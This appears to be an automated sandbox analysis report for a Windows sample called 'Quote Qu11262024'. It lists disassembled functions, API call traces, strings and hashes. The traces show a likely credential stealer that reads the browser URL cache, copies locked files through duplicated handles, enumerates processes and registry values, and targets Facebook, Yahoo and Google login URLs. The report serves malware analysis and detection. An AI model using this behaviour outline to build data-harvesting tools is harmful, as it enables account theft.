                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                    • String ID: bhv
                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2941347001-70141382
                                                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                    • String ID: visited:
                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                    • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                    • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                    • String ID: r!A$?^
                                                                                                    • API String ID: 2791114272-2246021526
                                                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 115830560-3916222277
                                                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 841 41837f-4183bf 842 4183c1-4183cc call 418197 841->842 843 4183dc-4183ec call 418160 841->843 848 4183d2-4183d8 842->848 849 418517-41851d 842->849 850 4183f6-41840b 843->850 851 4183ee-4183f1 843->851 848->843 852 418417-418423 850->852 853 41840d-418415 850->853 851->849 854 418427-418442 call 41739b 852->854 853->854 857 418444-41845d CreateFileW 854->857 858 41845f-418475 CreateFileA 854->858 859 418477-41847c 857->859 858->859 860 4184c2-4184c7 859->860 861 41847e-418495 GetLastError free 859->861 864 4184d5-418501 memset call 418758 860->864 865 4184c9-4184d3 860->865 862 4184b5-4184c0 call 444706 861->862 863 418497-4184b3 call 41837f 861->863 862->849 863->849 869 418506-418515 free 864->869 865->864 869->849
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 77810686-1717621600
                                                                                                    • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                    • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                    • String ID: $0.@$?^
                                                                                                    • API String ID: 2758756878-1195911728
                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
